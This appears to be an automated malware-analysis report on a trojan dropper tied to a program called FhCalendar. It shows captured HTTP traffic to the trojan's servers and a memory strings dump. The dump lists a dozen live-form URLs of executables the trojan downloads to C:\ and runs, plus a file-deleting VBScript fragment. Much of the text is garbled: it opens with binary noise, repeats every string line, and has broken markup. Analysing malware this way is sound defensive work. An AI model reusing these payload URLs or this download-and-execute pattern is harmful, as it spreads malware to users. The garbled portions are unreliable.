>...^(>.>.K..b.l.<....DzX....ejx...E.2.f.........|.....:..KSOMO..m.....#....#bqE.......^..ZT~.F.a.n.Q...%.Q..K.v..J<.....b.L.U........k..*E..&....0....=s....<. OfJ..g]..J.H.\5...Y{Y[......W.1..x0..a&...s#.[......0i...VC../9....1.w..*g..c.X.G=....... Y.D0..;...CV..'v....t.r\Y.E.........JR.[g...?J/..o..pT#v...3.m.*._.b...s.I=k.'vD./.w1q.'.<...W..`.n.,....$......d..|TQ.....9...) .]..mS.Sb._oN9...*,.3O..G%..K l.D...z?o..Io%|.....6....<mrS.A..wf>../...1.....C.1:V)z0..C....WO_..2=...F..*....H.$g....b...:.E.cq..d..(s<.....)|J..(............~..$........0....D......#3.?*4..;DJ....<..".......T.1G......s....R..b......c....;.J....S.......a....F.gn..8..;&. 1..v4:..}X..N7....&.f.?..9^..n..c ....7.:....IE.....vA....N..d\..#...n.......B.;...K.<..3YR.%Z..*. ....&..0.....q...{BK.h..$_.O..../...>qOF..=..t...Q4.`V._.8.!Jd\."e.....k..A.x.).R5..<....*.L!......p8A.ba%...H....kb...........{............?~-..&$..=J......S...r............j..W'\.........]..o0..........|..b)......P.k._..^....'yz.y......q......_......f..D...u.5.R.......FS.G-C....n.1..1j.VKp~.SKd.8.....(9......G..).8_.....o.BUPA....n\L.w../.....g.....jj..Nd/.wv...eq.W.@...........>..yr.Y.&wD....GR.#4c.V..'..7..De...%.3.{<..W..).&|:B.;{.W..........IA...d..a..Q...I...n..n .f.......Y.yp...9.z......<C.$.......I,R.o.b.>.7.m..Ed.-...6.....*1j(y?....I._ck5..J&......"oi..."7!.$8.4.@...q..,.g.K...J.M.<.azH4").V.....>..*zW...!I.'.-!.x.K.h..^..........B..l..[_y.).......[.Z..OB...\.W..>N...R.w;....oP... fHJ..7.E...u.........
<<
<<< skipped >>>
GET /api/GetConfig.ashx HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 330
{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncount":"1","setupcode":"0d28db4036a945fd9e9761f04cd18d62","showminitab":"1","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabrate":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrdn.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}....
GET /Api/GetHoliday.ashx HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 876
{"errno":"1","info":[{"holidayname":"......","holiday":"2014-01-31","restday":"2014-01-31,2014-02-01,2014-02-02,2014-02-03,2014-02-04,2014-02-05,2014-02-06","work":"2014-01-26,2014-02-08"},{"holidayname":"......","holiday":"2014-01-01","restday":"2014-01-01","work":""},{"holidayname":".........","holiday":"2014-04-05","restday":"2014-04-05,2014-04-06,2014-04-07","work":""},{"holidayname":".........","holiday":"2014-05-01","restday":"2014-05-01,2014-05-02,2014-05-03","work":"2014-05-04"},{"holidayname":".........","holiday":"2014-06-02","restday":"2014-05-31,2014-06-01,2014-06-02","work":""},{"holidayname":".........","holiday":"2014-09-08","restday":"2014-09-06,2014-09-07,2014-09-08","work":""},{"holidayname":".........","holiday":"2014-10-01","restday":"2014-10-01,2014-10-02,2014-10-03,2014-10-04,2014-10-05,2014-10-06,2014-10-07","work":"2014-09-28,2014-10-11"}]}....
GET /Api/GetWeather.ashx?province=??&city=?? HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 13
{"error":"0"}HTTP/1.1 200 OK..Date: Sat, 14 Jun 2014 09:01:23 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 2.0.50727..Cache-Control: private..Content-Type: text/plain; charset=utf-8..Content-Length: 13..{"error":"0"}..
GET /cms.gif?id=40490128&extendata= HTTP/1.1
Accept: */*
Referer: hXXp://dspcm.brand.sogou.com/qi
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: acookie.tanx.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: Tengine
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: image/gif
Transfer-Encoding: chunked
Connection: close
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Location: hXXp://dspcm.brand.sogou.com/pixel?tid=E0&ver=1&extendata=
31..GIF89a...................!.......,...........T..;..0..
GET /oemini/info.ini?id=41 HTTP/1.1
User-Agent: oemfhsli
Host: software.fhrlw.cn
HTTP/1.1 200 OK
Content-Length: 997
Content-Type: .ini
Last-Modified: Fri, 13 Jun 2014 08:44:03 GMT
Accept-Ranges: bytes
ETag: "4415c5a0e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:47 GMT
[Info]..FileCount = 1..Rate0 = 100..Rate1 = 70..[File0]..FileName=fhrl_0613.exe..FileDir= fhrl..FileTitle= ..........DocUrl = hXXp://VVV.fhrlw.com/readme.html..urlCount=2..url0=hXXp://dl1.fhrlw.com/fhrl/fhrl_0613.exe..url1=hXXp://dl2.fhrlw.com/fhrl/fhrl_0613.exe....BlockCount=12..BlockSize0=204800..Hash0=31171D0C6216B1555E85D7EC89AF40F1..BlockSize1=204800..Hash1=E1AA7FC27B8979618CF31CD1CF06829B..BlockSize2=204800..Hash2=0C88B5B81B4BCDB92DDD042D79554E5E..BlockSize3=204800..Hash3=3CF42153EC58C3560A92DC9062CA08A6..BlockSize4=204800..Hash4=C3C74AB7AE92A4ACFEEE460E8AEA6C47..BlockSize5=204800..Hash5=0E120EA4DA635D3847459411AC6741E0..BlockSize6=204800..Hash6=D7C70FED90A30442DDAB5FCE3BDDB3A1..BlockSize7=204800..Hash7=654F71158BB01559F0A6D0DAC1318A3E..BlockSize8=204800..Hash8=8843F00044AF9C94DAFB599CFB583203..BlockSize9=204800..Hash9=9DD6488FBA152DA7B3C4DCECDF778EDA..BlockSize10=204800..Hash10=CC86E269AB6B2D6CB588D3F69C7D00B3..BlockSize11=174816..Hash11=CFE74D55CD85196E8D934D31902D9D1B..HTTP/1.1 200 OK..Content-Length: 997..Content-Type: .ini..Last-Modified: Fri, 13 Jun 2014 08:44:03 GMT..Accept-Ranges: bytes..ETag: "4415c5a0e386cf1:4d6"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sat, 14 Jun 2014 09:00:47 GMT..[Info]..FileCount = 1..Rate0 = 100..Rate1 = 70..[File0]..FileName=fhrl_0613.exe..FileDir= fhrl..FileTitle= ..........DocUrl = hXXp://VVV.fhrlw.com/readme.html..urlCount=2..url0=hXXp://dl1.fhrlw.com/fhrl/fhrl_0613.exe..url1=hXXp://dl2.fhrlw.com/fhrl/fhrl_0613.exe....BlockCount=12..BlockSize0=204800..H
<<
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1832:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
.aspack
.aspack
.adata
.adata
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
kernel32.dll
kernel32.dll
user32.dll
user32.dll
EnumWindows
EnumWindows
ShellExecuteA
ShellExecuteA
http://software.fhrlw.cn/slience/fhsli_6_12001.exe
http://software.fhrlw.cn/slience/fhsli_6_12001.exe
C:/fhsli_6_12001.exe
C:/fhsli_6_12001.exe
C://fhsli_6_12001.exe
C://fhsli_6_12001.exe
http://ddl.9yfc.com/xxdd_165.exe
http://ddl.9yfc.com/xxdd_165.exe
C:/xxdd_165.exe
C:/xxdd_165.exe
C://xxdd_165.exe
C://xxdd_165.exe
http://wuji.oss-cn-hangzhou.aliyuncs.com/qd/114gglm_016.exe
http://wuji.oss-cn-hangzhou.aliyuncs.com/qd/114gglm_016.exe
C:/114gglm_016.exe
C:/114gglm_016.exe
C://114gglm_016.exe
C://114gglm_016.exe
http://dl.meinvkankan.com/goodpic_dae_627.exe
http://dl.meinvkankan.com/goodpic_dae_627.exe
C:/goodpic_dae_627.exe
C:/goodpic_dae_627.exe
C://goodpic_dae_627.exe
C://goodpic_dae_627.exe
http://lm.beilequ.com/update/365/365weatherIns_137.exe
http://lm.beilequ.com/update/365/365weatherIns_137.exe
C:/365weatherIns_137.exe
C:/365weatherIns_137.exe
C://365weatherIns_137.exe
C://365weatherIns_137.exe
http://home.yj005.com/JBDownload/jbist_[2018].exe
http://home.yj005.com/JBDownload/jbist_[2018].exe
C:/jbist_[2018].exe
C:/jbist_[2018].exe
C://jbist_[2018].exe
C://jbist_[2018].exe
http://down.duomi.com/DuomiMusic_V306.exe
http://down.duomi.com/DuomiMusic_V306.exe
C:/DuomiMusic_V306.exe
C:/DuomiMusic_V306.exe
C://DuomiMusic_V306.exe
C://DuomiMusic_V306.exe
http://down.shuyeer.net/dudu/dudu_b_55279.exe
http://down.shuyeer.net/dudu/dudu_b_55279.exe
C:/dudu_b_55279.exe
C:/dudu_b_55279.exe
C://dudu_b_55279.exe
C://dudu_b_55279.exe
http://dianxinshu.92ttz.com/download/setup_s1002.exe
http://dianxinshu.92ttz.com/download/setup_s1002.exe
C:/setup_s1002.exe
C:/setup_s1002.exe
C://setup_s1002.exe
C://setup_s1002.exe
http://qq2847894.b.xundisk.net/x1.exe
http://qq2847894.b.xundisk.net/x1.exe
c:/x1.exe
c:/x1.exe
c://x1.exe
c://x1.exe
http://boxdown.gtui.cn/KXWebDown/KXWebBox_3317_RBF.exe
http://boxdown.gtui.cn/KXWebDown/KXWebBox_3317_RBF.exe
C:/KXWebBox_3317_RBF.exe
C:/KXWebBox_3317_RBF.exe
C://KXWebBox_3317_RBF.exe
C://KXWebBox_3317_RBF.exe
bbs.125.la
bbs.125.la
tem.vbs
tem.vbs
fso.DeleteFile("
fso.DeleteFile("
Set fso = CreateObject("Scripting.FileSystemObject")
Set fso = CreateObject("Scripting.FileSystemObject")
F%*.*f
F%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
RASAPI32.dll
RASAPI32.dll
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
WINMM.dll
WINMM.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
COMCTL32.dll
COMCTL32.dll
WS2_32.dll
WS2_32.dll
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
RegCreateKeyExA
RegCreateKeyExA
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s <%s>
%s <%s>
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
c:\%original file name%.exe
c:\%original file name%.exe
u.ht*D
u.ht*D
@u.Wj
@u.Wj
hhctrl.ocx
hhctrl.ocx
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
File%d
File%d
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
GDI32.DLL
GDI32.DLL
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
{X-X-X-XX-XXXXXX}
{X-X-X-XX-XXXXXX}
ddeexec
ddeexec
%s\ShellNew
%s\ShellNew
%s\DefaultIcon
%s\DefaultIcon
%s\shell\printto\%s
%s\shell\printto\%s
%s\shell\print\%s
%s\shell\print\%s
%s\shell\open\%s
%s\shell\open\%s
ECTrans.dll
ECTrans.dll
RegEnumKeyA
RegEnumKeyA
RegOpenKeyA
RegOpenKeyA
RegDeleteKeyA
RegDeleteKeyA
RegCreateKeyA
RegCreateKeyA
Backup\Backup.ini
Backup\Backup.ini
KINGSOFTFASTAIT3CHNEXEMUTEX
KINGSOFTFASTAIT3CHNEXEMUTEX
SOFTWARE\Kingsoft\FastAIT\3.0\ChnEXE
SOFTWARE\Kingsoft\FastAIT\3.0\ChnEXE
CChnEXEDoc
CChnEXEDoc
KPGs\*.KPG
KPGs\*.KPG
KPGMaker.exe
KPGMaker.exe
ChnEXE.chm
ChnEXE.chm
KPIs\*.KPI
KPIs\*.KPI
TEMPPE.WN
TEMPPE.WN
.?AVCToolCmdUI@@
.?AVCToolCmdUI@@
.?AVCStatusCmdUI@@
.?AVCStatusCmdUI@@
KERNEL32.DLL
KERNEL32.DLL
,),,,,**((%%!
,),,,,**((%%!
9111111113
9111111113
3111111111
3111111111
411111111111
411111111111
41111111111111
41111111111111
6%%%!!"'- :
6%%%!!"'- :
311111111111111
311111111111111
2611111111111111
2611111111111111
1(%%%%!!"
1(%%%%!!"
9111111111111111
9111111111111111
6%%%%!"'/ #=
6%%%%!"'/ #=
3111111111111111
3111111111111111
((%%%%!!
((%%%%!!
@%%%%!!"
@%%%%!!"
261111111111111111
261111111111111111
6(%%%%!!"
6(%%%%!!"
4111111111111111111
4111111111111111111
3111111111111111111
3111111111111111111
41111111111111111111
41111111111111111111
((%%%%!!"
((%%%%!!"
@(%%%%!!"
@(%%%%!!"
6(%%%%!"
6(%%%%!"
@(%%%!!"
@(%%%!!"
@%%%%!!!
@%%%%!!!
6%%%%!!"
6%%%%!!"
@%%%%!!!"
@%%%%!!!"
](%%%%!!"
](%%%%!!"
6%%%%!!!"
6%%%%!!!"
6%%%%!!!
6%%%%!!!
](%%%%!!!"
](%%%%!!!"
[---'%!!!"
[---'%!!!"
:--'%%!!!
:--'%%!!!
:-'%%%!!!
:-'%%%!!!
-'%%%%!!!
-'%%%%!!!
3%%%%!!!"
3%%%%!!!"
---44--- 42
---44--- 42
`.%%%%!!!"
`.%%%%!!!"
(111.3..3=>
(111.3..3=>
9.333//'.39>
9.333//'.39>
6%%%%!!'
6%%%%!!'
9/31111%.39>
9/31111%.39>
#### # ''
#### # ''
#### ##--
#### ##--
### $$4-
### $$4-
$$$# #-=
$$$# #-=
.%%%%!!!"
.%%%%!!!"
sssh~~h
sssh~~h
].%%%!!!""
].%%%!!!""
6%%%%!!""
6%%%%!!""
6%%%!!!""
6%%%!!!""
}|||}}mm}||sshkmm~~}}
}|||}}mm}||sshkmm~~}}
q___hh__sshkhh__s
q___hh__sshkhh__s
@%%%!!!""
@%%%!!!""
lexeetx
lexeetx
>?@?==?@@@
>?@?==?@@@
].!%!!!""
].!%!!!""
=@@???=@@@
=@@???=@@@
6%%!!!!""
6%%!!!!""
?@@???=@@@
?@@???=@@@
6%%!!!"""
6%%!!!"""
=@@??==?@@@
=@@??==?@@@
6%%!!!""
6%%!!!""
>?@???==@@@@
>?@???==@@@@
9%%!!!""
9%%!!!""
# '(%%%%!!%%!' 2>::444-9
# '(%%%%!!%%!' 2>::444-9
?%%!!!""
?%%!!!""
'%%%!!''''./>24:444 9[
'%%%!!''''./>24:444 9[
3%%!!!""
3%%!!!""
:.%!!!""
:.%!!!""
- 4-.FGHP
- 4-.FGHP
%%9:<'</pre><pre>CJKTAB32.dll</pre><pre>c:\KConvert Files</pre><pre>\/:*?"<>|</pre><pre>%s%s%d%s</pre><pre>:?0_1#"9</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>CHNEXE</pre><pre>2, 0, 0, 2</pre><pre>ChnEXE</pre><pre>ChnEXE.EXE</pre><pre>ChnEXE.Document</pre><pre>ChnEXE Document</pre><pre>(*.*)</pre><pre>%s ...1</pre><pre>%s ...#</pre><pre>%s ...</pre><pre>(*.EXE)|*.exe|</pre><pre>Output.prn$</pre><pre>1, 0, 0, 0</pre><pre>KConvert.EXE</pre><pre>KConvert.Document</pre><pre>\ / : * ? " < > |</pre><pre>(*.*)|*.*||</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>%original file name%.exe_1832_rwx_00566000_00002000:</b><pre>kernel32.dll</pre><pre>user32.dll</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>ole32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>comdlg32.dll</pre><pre>ShellExecuteA</pre><pre>InternetCanonicalizeUrlA</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>FhCalendar.exe_588:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>CNotSupportedException</pre><pre>CCmdTarget</pre><pre>CHttpFile</pre><pre>hhctrl.ocx</pre><pre>Please contact the application's support team for more information.
%%9:<'</pre><pre>CJKTAB32.dll</pre><pre>c:\KConvert Files</pre><pre>\/:*?"<>|</pre><pre>%s%s%d%s</pre><pre>:?0_1#"9</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>CHNEXE</pre><pre>2, 0, 0, 2</pre><pre>ChnEXE</pre><pre>ChnEXE.EXE</pre><pre>ChnEXE.Document</pre><pre>ChnEXE Document</pre><pre>(*.*)</pre><pre>%s ...1</pre><pre>%s ...#</pre><pre>%s ...</pre><pre>(*.EXE)|*.exe|</pre><pre>Output.prn$</pre><pre>1, 0, 0, 0</pre><pre>KConvert.EXE</pre><pre>KConvert.Document</pre><pre>\ / : * ? " < > |</pre><pre>(*.*)|*.*||</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>%original file name%.exe_1832_rwx_00566000_00002000:</b><pre>kernel32.dll</pre><pre>user32.dll</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>ole32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>comdlg32.dll</pre><pre>ShellExecuteA</pre><pre>InternetCanonicalizeUrlA</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>FhCalendar.exe_588:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>CNotSupportedException</pre><pre>CCmdTarget</pre><pre>CHttpFile</pre><pre>hhctrl.ocx</pre><pre>Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
operator
operator
S"S$S%S'S(S)S S,S-S/S0S1S2S3S4S5S6S7S8S<S><pre>U!U%U&U?</pre><pre>X"X#X%X&X'X(X)X X,X-X.X/X1X2X3X4X6X7X8X9X:X;X<X>X?X@XAXBXCXEXFXGXHXIXJXKXNXOXPXRXSXUXVXWXYXZX[X\X]X_X`XaXbXcXdXfXgXhXiXjXmXnXoXpXqXrXsXtXuXvXwXxXyXzX{X|X}X</X></pre><pre>_!_"_#_$_?</pre><pre>%d'd(d)d d.d/d0d1d2d3d5d6d7d8d9d;d<d>d@dBdCdIdKdLdMdNdOdPdQdSdUdVdWdYdZd[d\d]d_d`dadbdcdddedfdhdjdkdldndodpdqdrdsdtdudvdwd{d|d}d~d</d></pre><pre>"e#e$e&e'e(e)e*e,e-e0e1e2e3e7e:e<e><pre>"P%Q%R%S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%b%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q%r%s%</pre><pre>1 1!1"1#1$1%1&1'1(1)1</pre><pre>!0"0#0$0%0&0'0(0)0</pre><pre>% %!%"%#%$%%%&%'%(%)%*% %,%-%.%/%0%1%2%3%4%5%6%7%8%9%:%;%<%=%>%?%@%A%B%C%D%E%F%G%H%I%J%K%</pre><pre>W%f?i</pre><pre>e.lFO</pre><pre>}!}#}$}%}&}(})}*},}-}.}0}1}2}3}4}5}6}</pre><pre>urlsS</pre><pre>~ ~!~"~#~$~%~&~'~(~)~*~ ~,~-~.~/~0~1~2~3~4~5~6~7~8~9~?</pre><pre>u%urrGS</pre><pre>]']&].]$]</pre><pre>s"s9s%s,s8s1sPsMsWs`slsos~s</pre><pre>x<x%x><pre>{.{1{ {%{${3{>{</pre><pre>closeMiniUrl</pre><pre>closePopUrl</pre><pre>203.117.180.36</pre><pre>232,1!2@</pre><pre>e:\FhWork\Work\FhCalendar\Release\FhCalendar.pdb</pre><pre>KERNEL32.dll</pre><pre>GetKeyState</pre><pre>SetWindowsHookExW</pre><pre>UnhookWindowsHookEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExW</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteW</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>COMCTL32.dll</pre><pre>UrlUnescapeW</pre><pre>SHLWAPI.dll</pre><pre>oledlg.dll</pre><pre>DuiLib_u.dll</pre><pre>WINMM.dll</pre><pre>WS2_32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>InternetCrackUrlW</pre><pre>InternetCanonicalizeUrlW</pre><pre>InternetOpenUrlW</pre><pre>WININET.dll</pre><pre>OLEACC.dll</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>GetProcessHeap</pre><pre>CreateDialogIndirectParamW</pre><pre>GetViewportExtEx</pre><pre>SetViewportOrgEx</pre><pre>OffsetViewportOrgEx</pre><pre>SetViewportExtEx</pre><pre>ScaleViewportExtEx</pre><pre>WINSPOOL.DRV</pre><pre>COMDLG32.dll</pre><pre>RegCreateKeyExW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyW</pre><pre>RegEnumKeyW</pre><pre>.PAVCOleException@@</pre><pre>.PAVCException@@</pre><pre>.PAVCObject@@</pre><pre>.PAVCMemoryException@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCInvalidArgException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.?AVCCmdUI@@</pre><pre>.?AVCHttpFile@@</pre><pre>.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@</pre><pre>.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@</pre><pre>.PAVCArchiveException@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCUserException@@</pre><pre>.PAVCFileException@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCOleDispatchException@@</pre><pre>zcÁ</pre><pre>.?AVCCmdTarget@@</pre><pre>.PAVCInternetException@@</pre><pre>.?AVCMiniWebWnd@@</pre><pre>.?AVCPopWebWnd@@</pre><pre>.?AVCMD5@@</pre><pre>.?AVCMD5File@@</pre><pre>5*5)5*5)5*5)5*5)5*5)5*5)5*5)5*5)5*5*5)*4</pre><pre>!>qMRqqq=jqq;q@!!%dpRBepZpqeGe2!!</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Network</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>%s%s.dll</pre><pre>A%s (%s:%d)</pre><pre>%s 